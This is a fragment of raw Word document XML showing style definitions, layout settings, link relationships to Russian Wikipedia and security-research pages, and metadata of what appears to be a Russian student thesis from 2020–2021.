  <w:style w:type="character" w:customStyle="1" w:styleId="aff7">
    <w:name w:val="ВКР Обычный Знак"/>
    <w:basedOn w:val="a2"/>
    <w:link w:val="aff6"/>
    <w:rsid w:val="00F870DF"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="aff8">
    <w:name w:val="Чертежный"/>
    <w:rsid w:val="00F870DF"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="ISOCPEUR" w:hAnsi="ISOCPEUR" w:cs="Times New Roman"/>
      <w:i/>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315">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>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09095384">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013650556">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1020592639">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1047342155">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178731352">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26069678">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="12288068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04622285">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05362208">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4093255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32970130">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498299620">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631860698">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1702390137">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759718697">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1798988015">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07642368">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ptsecurity.com/ru-ru/research/analytics/financial-application-vulnerabilities-2018/" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpeg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/Reac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s://gs.statcounter.com/os-market-sha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3.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.anti-malware.ru/analytics/Threats_Analysis/principles_detection_malicious_applications_Android" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/Microsoft_Visual_Studi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ru.wikipedia.org/wiki/Android" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/Android_Studio" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="charts/chart2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/Windows_10_Mobile"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bosfera.ru/pdf/16.%20%D0%A0%D0%B8%D0%BD%D0%B0%D1%82%20%D0%90%D0%BD%D0%B8%D1%81%D0%B8%D0%BC%D0%BE%D0%B2.pdf" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/IOS" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/Internet_Information_Services" TargetMode="Externa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image" Target="media/image6.jpeg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.komus.ru/katalog/tekhnika/kompyutery-i-periferiya/nositeli-informatsii/flesh-pamyat-usb/flesh-pamyat-transcend-jetflash-350-4-gb-usb-2-0-chernaya/p/272691/?from=block-123-1" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/.NET_Core" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ru.wikipedia.org/wiki/Visual_Studio_Cod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85571-9439-44B0-A934-CC79EC6AD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99</Pages>
  <Words>20878</Words>
  <Characters>119007</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>991</Lines>
  <Paragraphs>279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49</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-17T03:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-14T15:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>